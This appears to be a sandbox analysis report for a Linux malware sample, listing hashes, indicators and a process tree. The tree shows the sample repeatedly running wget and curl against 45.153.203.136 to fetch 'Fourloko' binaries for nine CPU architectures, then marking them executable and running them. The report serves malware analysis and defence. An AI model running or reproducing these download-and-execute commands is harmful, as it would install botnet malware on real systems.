fe335e308316646f9f5be84dec1138d3b5202b552a847125fa9fab5c411e0bb0

General

Target

65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118
Size

1KB
MD5

65cff49fe882fc8af17f71ddf781fba5
SHA1

c41bbacedc6d44e4f9b6252336717e4d459c6db3
SHA256

fe335e308316646f9f5be84dec1138d3b5202b552a847125fa9fab5c411e0bb0
SHA512

58ce86fd049c24af22e91b9f7cae8f4bb48e630f1c6781dddb7c001a59ffeea3624d6716e7a5305800d03d7cfc129b8a61674c761f0d73944f7bc06fc901dd5c

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

awooawooawooawooawooawooawooawooawooawoo

ioc	pid	process
/tmp/awoo	1508	awoo
/tmp/awoo	1515	awoo
/tmp/awoo	1521	awoo
/tmp/awoo	1527	awoo
/tmp/awoo	1533	awoo
/tmp/awoo	1539	awoo
/tmp/awoo	1545	awoo
/tmp/awoo	1551	awoo
/tmp/awoo	1557	awoo
/tmp/awoo	1563	awoo

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118

description ioc process

File opened for modification /tmp/awoo 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118

description	ioc	process
File opened for modification	/tmp/awoo	65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118

/tmp/65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118
/tmp/65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1500

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.x86
2⤵
PID:1501

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.x86
2⤵
PID:1502

/bin/cat
cat Fourloko.x86
2⤵
PID:1506

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1507

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1508

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.mips
2⤵
PID:1510

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.mips
2⤵
PID:1511

/bin/cat
cat Fourloko.mips
2⤵
PID:1513

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1514

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1515

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.mpsl
2⤵
PID:1517

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.mpsl
2⤵
PID:1518

/bin/cat
cat Fourloko.mpsl
2⤵
PID:1519

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1520

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1521

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.arm4
2⤵
PID:1523

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.arm4
2⤵
PID:1524

/bin/cat
cat Fourloko.arm4
2⤵
PID:1525

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1526

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1527

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.arm5
2⤵
PID:1529

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.arm5
2⤵
PID:1530

/bin/cat
cat Fourloko.arm5
2⤵
PID:1531

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1532

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1533

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.arm6
2⤵
PID:1535

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.arm6
2⤵
PID:1536

/bin/cat
cat Fourloko.arm6
2⤵
PID:1537

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1538

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1539

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.arm7
2⤵
PID:1541

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.arm7
2⤵
PID:1542

/bin/cat
cat Fourloko.arm7
2⤵
PID:1543

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1544

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1545

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.ppc
2⤵
PID:1547

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.ppc
2⤵
PID:1548

/bin/cat
cat Fourloko.ppc
2⤵
PID:1549

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1550

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1551

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.m68k
2⤵
PID:1553

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.m68k
2⤵
PID:1554

/bin/cat
cat Fourloko.m68k
2⤵
PID:1555

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1556

/tmp/awoo
./awoo
2⤵
- Executes dropped EXE
PID:1557

/usr/bin/wget
wget http://45.153.203.136/bin/Fourloko.sh4
2⤵
PID:1559

/usr/bin/curl
curl -O http://45.153.203.136/bin/Fourloko.sh4
2⤵
PID:1560

/bin/cat
cat Fourloko.sh4
2⤵
PID:1561

/bin/chmod
chmod +x 65cff49fe882fc8af17f71ddf781fba5_JaffaCakes118 awoo config-err-0n3RLC netplan_feqlvm4_ snap-private-tmp ssh-bEAtp26W9Nzp systemd-private-c7172cc977af4d988b033fc48d53a2fc-bolt.service-NDoJqz systemd-private-c7172cc977af4d988b033fc48d53a2fc-colord.service-lN6YGF systemd-private-c7172cc977af4d988b033fc48d53a2fc-ModemManager.service-ZKS9WW systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-resolved.service-ld4oja systemd-private-c7172cc977af4d988b033fc48d53a2fc-systemd-timedated.service-5PmINf
2⤵
PID:1562

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads